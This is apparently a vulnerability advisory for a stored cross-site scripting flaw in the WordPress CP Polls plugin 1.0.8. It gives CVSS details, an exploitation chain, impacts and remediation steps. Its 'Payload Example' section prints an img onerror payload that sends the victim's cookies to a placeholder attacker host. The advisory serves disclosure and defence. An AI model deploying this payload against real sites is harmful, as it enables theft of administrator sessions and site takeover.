Executive Summary
A persistent cross-site scripting (XSS) vulnerability has been identified in the WordPress CP Polls plugin version 1.0.8, tracked as CVE-2016-20066 with a CVSS score of 7.2 (High). The flaw stems from insufficient sanitization of user-supplied file content during the file upload process, allowing authenticated attackers to inject persistent JavaScript payloads that execute in the browsers of site administrators and other users.
The vulnerability was disclosed to the National Vulnerability Database (NVD) on June 15, 2026, despite originating from code written in the 2016 era.
Vulnerability Details
| Field | Detail |
|---|---|
| CVE ID | CVE-2016-20066 |
| CVSS Score | 7.2 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low (authenticated user) |
| User Interaction | Required (admin views malicious content) |
| Scope | Changed |
| Affected Software | WordPress CP Polls Plugin 1.0.8 |
Technical Analysis
The CP Polls plugin for WordPress fails to adequately sanitize file content submitted through its upload interface. An attacker who has obtained minimal plugin access can upload a file containing embedded HTML event handlers — such as onerror attributes within image tags or script elements disguised within allowed file types.
When a site administrator or privileged user views the uploaded content through the WordPress administration panel, the injected script executes in their browser context. Because the script is stored server-side, the attack is classified as stored (persistent) XSS, making it more dangerous than reflected variants.
Attack Vector
A typical exploitation chain looks like this:
- Attacker registers or gains a low-privilege account on a WordPress site running CP Polls 1.0.8
- Attacker crafts a file with embedded JavaScript (e.g., an image with a malicious
onerrorattribute) - The plugin stores the file without sanitization
- An administrator views poll submissions or media — the script executes in the admin's browser
- The attacker can steal session cookies, redirect the admin, or perform actions on their behalf
Payload Example
<img src="x" onerror="fetch('https://attacker.example/steal?c='+document.cookie)" />When embedded in an accepted file format and uploaded through the plugin, this payload fires whenever the affected content is rendered in a browser that has not stripped the event handler.
Impact
Successful exploitation can lead to:
- Session hijacking: Theft of administrator authentication cookies, granting full site control
- Credential harvesting: Injected keyloggers or fake login overlays
- Malware distribution: Defacement or script injection targeting site visitors
- Privilege escalation: Executing admin-level actions on behalf of the hijacked session
- Persistent backdoor: Continued access even after password changes if session tokens are reused
Affected Versions
| Software | Affected Version |
|---|---|
| WordPress CP Polls Plugin | 1.0.8 and earlier |
Remediation
Immediate Actions
- Disable or remove the CP Polls plugin until a patched version is available
- Audit recent file uploads through the plugin for suspicious content
- Review administrator session logs for unauthorized activity
- Rotate credentials for any accounts that may have been exposed
Long-Term Mitigations
- Implement a Content Security Policy (CSP) header to restrict inline script execution:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; - Regularly audit installed plugins and remove unused or unmaintained ones
- Keep all WordPress plugins updated and subscribe to security advisories
- Consider a Web Application Firewall (WAF) to filter XSS payloads in transit
CVSS 3.1 Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N